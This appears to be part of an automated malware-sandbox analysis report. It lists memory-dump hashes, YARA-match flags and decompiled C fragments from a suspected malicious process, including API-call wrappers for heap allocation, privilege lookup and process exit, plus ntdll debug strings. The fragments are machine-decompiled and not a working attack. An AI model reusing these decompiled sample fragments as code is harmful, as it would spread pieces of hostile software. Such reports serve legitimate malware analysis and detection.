                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bb84c18376172076e6b01768eee83769259a3a6e093ea94d2d367d31a260a7d2
                                                                      • Instruction ID: 35683e20c30727a0a50fc25648d66be4b9b2993e0307e13ab0f028c6786be61e
                                                                      • Opcode Fuzzy Hash: bb84c18376172076e6b01768eee83769259a3a6e093ea94d2d367d31a260a7d2
                                                                      • Instruction Fuzzy Hash: D9900265701000424280717988849064005BBE1351751C131A0988590D85998865A6A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bd272313a4561b97e2a77293f6db5bdc7a4b62172856c1a4098c1703b8bc000d
                                                                      • Instruction ID: 4d16e4e1629a1a56c2317ffb855e97b8f64b08cd8628e7821d6db24834b5c9a2
                                                                      • Opcode Fuzzy Hash: bd272313a4561b97e2a77293f6db5bdc7a4b62172856c1a4098c1703b8bc000d
                                                                      • Instruction Fuzzy Hash: 2C90027530140402D2406169485470B000597D0342F51C021A1154595D86658851B5B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 580ee2e1aa0067b88385bb63b0b71c315acf281c68f247aa332ddb2ed6f99b0b
                                                                      • Instruction ID: 30b23d690dc791b41255fc54d8e042908643adc7cf5a9ca76368522f370fbd6b
                                                                      • Opcode Fuzzy Hash: 580ee2e1aa0067b88385bb63b0b71c315acf281c68f247aa332ddb2ed6f99b0b
                                                                      • Instruction Fuzzy Hash: 5E90027530100802D2C07169444464A000597D1341F91C025A0015694DCA558A59B7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4e3d1e98a75bca62e5ae7a4f5b524b109a05bd2496f3ad2131cc676b585179b5
                                                                      • Instruction ID: 812e6f905eebff400b6be02b975a221363fb6cee4f5648d97503e7878f394828
                                                                      • Opcode Fuzzy Hash: 4e3d1e98a75bca62e5ae7a4f5b524b109a05bd2496f3ad2131cc676b585179b5
                                                                      • Instruction Fuzzy Hash: 9890026531180042D34065794C54B07000597D0343F51C125A0144594CC9558861A561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 156d475072d643d29f3f5845004dcd741e4b9e82ede64e99d19ddb5fe58444f6
                                                                      • Instruction ID: 67ce5d888483575511ab0db52cbad6eb4907d561215664751a5737bb9d1ed066
                                                                      • Opcode Fuzzy Hash: 156d475072d643d29f3f5845004dcd741e4b9e82ede64e99d19ddb5fe58444f6
                                                                      • Instruction Fuzzy Hash: 1A90026530100003D280716954586064005E7E1341F51D021E0404594CD9558856A262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d59f73717d0c3bc636959420a85b0aa802ea82b70ab852b4d867c886878cebfb
                                                                      • Instruction ID: b29a32a5fdac0b2223fed188fbadd1c9ca00218e6fa01a6dd5c9928f5bd57660
                                                                      • Opcode Fuzzy Hash: d59f73717d0c3bc636959420a85b0aa802ea82b70ab852b4d867c886878cebfb
                                                                      • Instruction Fuzzy Hash: 4B90026D31300002D2C07169544860A000597D1342F91D425A0005598CC9558869A361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 094985bdb95072362cd5b18895af614c1f1615059a9ef30a5da40f967c787146
                                                                      • Instruction ID: 43586842f2aa834978b880b07414075b7d718f259dd00ce781edbd503d2792d2
                                                                      • Opcode Fuzzy Hash: 094985bdb95072362cd5b18895af614c1f1615059a9ef30a5da40f967c787146
                                                                      • Instruction Fuzzy Hash: 2190027531114402D25061698444706000597D1341F51C421A0814598D86D58891B162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e8e6a39b8260d8261727141a88f256a51463264420a4ad83b8929b50e9296de1
                                                                      • Instruction ID: dc8af70368fabf69d6828f4a3e3b0569679aecfa83ec2d23925cb6a9165dd5f1
                                                                      • Opcode Fuzzy Hash: e8e6a39b8260d8261727141a88f256a51463264420a4ad83b8929b50e9296de1
                                                                      • Instruction Fuzzy Hash: 4590027530100402D24065A95448646000597E0341F51D021A5014595EC6A58891B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                      • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                      • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                      • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				void* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				int _t14;
                                                                      				long _t21;
                                                                      				intOrPtr* _t25;
                                                                      				void* _t26;
                                                                      				void* _t30;
                                                                      
                                                                      				_t30 = __eflags;
                                                                      				_v68 = 0;
                                                                      				L00419D20( &_v67, 0, 0x3f);
                                                                      				E0041A900( &_v68, 3);
                                                                      				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                      				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                      				_t25 = _t13;
                                                                      				if(_t25 != 0) {
                                                                      					_t21 = _a8;
                                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                      					_t32 = _t14;
                                                                      					if(_t14 == 0) {
                                                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                      					}
                                                                      					return _t14;
                                                                      				}
                                                                      				return _t13;
                                                                      			}












                                                                      0x00407260
                                                                      0x0040726f
                                                                      0x00407273
                                                                      0x0040727e
                                                                      0x0040728e
                                                                      0x0040729e
                                                                      0x004072a3
                                                                      0x004072aa
                                                                      0x004072ad
                                                                      0x004072ba
                                                                      0x004072bc
                                                                      0x004072be
                                                                      0x004072db
                                                                      0x004072db
                                                                      0x00000000
                                                                      0x004072dd
                                                                      0x004072e2

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                      • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                      • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                      • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				char _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                      				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x004184df
                                                                      0x004184e7
                                                                      0x004184fd
                                                                      0x00418501

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                      				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x004184a7
                                                                      0x004184bd
                                                                      0x004184c1

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				int _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x0041864a
                                                                      0x00418660
                                                                      0x00418664

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418510(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}




                                                                      0x00418513
                                                                      0x0041852a
                                                                      0x00418538

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E0041850E(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				asm("sti");
                                                                      				asm("sbb dl, [ebp-0x75]");
                                                                      				_t5 = _a4;
                                                                      				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}




                                                                      0x0041850e
                                                                      0x0041850f
                                                                      0x00418513
                                                                      0x0041852a
                                                                      0x00418538

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 495936aa1f454278ece612d449318c9a6478e82203cf7e709259bd8a785b447f
                                                                      • Instruction ID: f1a7219ed0e73f1c768c5849778d90572584f2c3e7722ef04f5753e2d938b4af
                                                                      • Opcode Fuzzy Hash: 495936aa1f454278ece612d449318c9a6478e82203cf7e709259bd8a785b447f
                                                                      • Instruction Fuzzy Hash: F1D05B756002047BD730DF75CCC5FD73B689F59750F15855CB95DAB242C931AA04CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                                      • Instruction ID: ebb6eae82783042fdfa7b67d75d166a2d69caf98c6c08761ff6f1cae3a7c831a
                                                                      • Opcode Fuzzy Hash: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                                      • Instruction Fuzzy Hash: BCB092B2A064C5CAEB51E7B04A08B2B7A04BBE0741F26C062E2020681A47B8C491F6B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • Go determine why that thread has not released the critical section., xrefs: 00AAB3C5
                                                                      • The resource is owned shared by %d threads, xrefs: 00AAB37E
                                                                      • The critical section is owned by thread %p., xrefs: 00AAB3B9
                                                                      • *** then kb to get the faulting stack, xrefs: 00AAB51C
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AAB38F
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 00AAB48F
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00AAB2F3
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AAB3D6
                                                                      • *** enter .exr %p for the exception record, xrefs: 00AAB4F1
                                                                      • This failed because of error %Ix., xrefs: 00AAB446
                                                                      • The instruction at %p tried to %s , xrefs: 00AAB4B6
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00AAB53F
                                                                      • <unknown>, xrefs: 00AAB27E, 00AAB2D1, 00AAB350, 00AAB399, 00AAB417, 00AAB48E
                                                                      • The instruction at %p referenced memory at %p., xrefs: 00AAB432
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00AAB484
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00AAB2DC
                                                                      • read from, xrefs: 00AAB4AD, 00AAB4B2
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00AAB476
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 00AAB352
                                                                      • a NULL pointer, xrefs: 00AAB4E0
                                                                      • *** Inpage error in %ws:%s, xrefs: 00AAB418
                                                                      • an invalid address, %p, xrefs: 00AAB4CF
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00AAB39B
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00AAB314
                                                                      • The resource is owned exclusively by thread %p, xrefs: 00AAB374
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00AAB305
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00AAB47D
                                                                      • *** enter .cxr %p for the context, xrefs: 00AAB50D
                                                                      • write to, xrefs: 00AAB4A6
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00AAB323
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 47dded41aac772e627116f0fa754a513110a85f3ec8421f3f57f5bcbb035aea6
                                                                      • Instruction ID: 2fe6b8618f5c3e011d8c8b535b71ab330b3ee8b95c1081585de64504826e1fa6
                                                                      • Opcode Fuzzy Hash: 47dded41aac772e627116f0fa754a513110a85f3ec8421f3f57f5bcbb035aea6
                                                                      • Instruction Fuzzy Hash: 9D810275A11210FFDB22AB168C4AE7B3B36AF8BB55F054444F8062F593D3618C51DBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00AB1C06() {
                                                                      				signed int _t27;
                                                                      				char* _t104;
                                                                      				char* _t105;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t120;
                                                                      
                                                                      				_t105 = 0x9d48a4;
                                                                      				_t104 = "HEAP: ";
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push( *0xae589c);
                                                                      				E009FB150("Heap error detected at %p (heap handle %p)\n",  *0xae58a0);
                                                                      				_t27 =  *0xae5898; // 0x0
                                                                      				if(_t27 <= 0xf) {
                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M00AB1E96))) {
                                                                      						case 0:
                                                                      							_t105 = "heap_failure_internal";
                                                                      							goto L21;
                                                                      						case 1:
                                                                      							goto L21;
                                                                      						case 2:
                                                                      							goto L21;
                                                                      						case 3:
                                                                      							goto L21;
                                                                      						case 4:
                                                                      							goto L21;
                                                                      						case 5:
                                                                      							goto L21;
                                                                      						case 6:
                                                                      							goto L21;
                                                                      						case 7:
                                                                      							goto L21;
                                                                      						case 8:
                                                                      							goto L21;
                                                                      						case 9:
                                                                      							goto L21;
                                                                      						case 0xa:
                                                                      							goto L21;
                                                                      						case 0xb:
                                                                      							goto L21;
                                                                      						case 0xc:
                                                                      							goto L21;
                                                                      						case 0xd:
                                                                      							goto L21;
                                                                      						case 0xe:
                                                                      							goto L21;
                                                                      						case 0xf:
                                                                      							goto L21;
                                                                      					}
                                                                      				}
                                                                      				L21:
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push(_t105);
                                                                      				E009FB150("Error code: %d - %s\n",  *0xae5898);
                                                                      				_t113 =  *0xae58a4; // 0x0
                                                                      				if(_t113 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter1: %p\n",  *0xae58a4);
                                                                      				}
                                                                      				_t115 =  *0xae58a8; // 0x0
                                                                      				if(_t115 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter2: %p\n",  *0xae58a8);
                                                                      				}
                                                                      				_t117 =  *0xae58ac; // 0x0
                                                                      				if(_t117 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter3: %p\n",  *0xae58ac);
                                                                      				}
                                                                      				_t119 =  *0xae58b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0xae58b4);
                                                                      					E009FB150("Last known valid blocks: before - %p, after - %p\n",  *0xae58b0);
                                                                      				} else {
                                                                      					_t120 =  *0xae58b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E009FB150("Stack trace available at %p\n", 0xae58c0);
                                                                      			}











                                                                      0x00ab1c10
                                                                      0x00ab1c16
                                                                      0x00ab1c1e
                                                                      0x00ab1c3d
                                                                      0x00ab1c3e
                                                                      0x00ab1c20
                                                                      0x00ab1c35
                                                                      0x00ab1c3a
                                                                      0x00ab1c44
                                                                      0x00ab1c55
                                                                      0x00ab1c5a
                                                                      0x00ab1c65
                                                                      0x00ab1c67
                                                                      0x00000000
                                                                      0x00ab1c6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00ab1c67
                                                                      0x00ab1cdc
                                                                      0x00ab1ce5
                                                                      0x00ab1d04
                                                                      0x00ab1d05
                                                                      0x00ab1ce7
                                                                      0x00ab1cfc
                                                                      0x00ab1d01
                                                                      0x00ab1d0b
                                                                      0x00ab1d17
                                                                      0x00ab1d1f
                                                                      0x00ab1d25
                                                                      0x00ab1d30
                                                                      0x00ab1d4f
                                                                      0x00ab1d50
                                                                      0x00ab1d32
                                                                      0x00ab1d47
                                                                      0x00ab1d4c
                                                                      0x00ab1d61
                                                                      0x00ab1d67
                                                                      0x00ab1d68
                                                                      0x00ab1d6e
                                                                      0x00ab1d79
                                                                      0x00ab1d98
                                                                      0x00ab1d99
                                                                      0x00ab1d7b
                                                                      0x00ab1d90
                                                                      0x00ab1d95
                                                                      0x00ab1daa
                                                                      0x00ab1db0
                                                                      0x00ab1db1
                                                                      0x00ab1db7
                                                                      0x00ab1dc2
                                                                      0x00ab1de1
                                                                      0x00ab1de2
                                                                      0x00ab1dc4
                                                                      0x00ab1dd9
                                                                      0x00ab1dde
                                                                      0x00ab1df3
                                                                      0x00ab1df9
                                                                      0x00ab1dfa
                                                                      0x00ab1e00
                                                                      0x00ab1e0a
                                                                      0x00ab1e13
                                                                      0x00ab1e32
                                                                      0x00ab1e33
                                                                      0x00ab1e15
                                                                      0x00ab1e2a
                                                                      0x00ab1e2f
                                                                      0x00ab1e39
                                                                      0x00ab1e4a
                                                                      0x00ab1e02
                                                                      0x00ab1e02
                                                                      0x00ab1e08
                                                                      0x00000000
                                                                      0x00000000
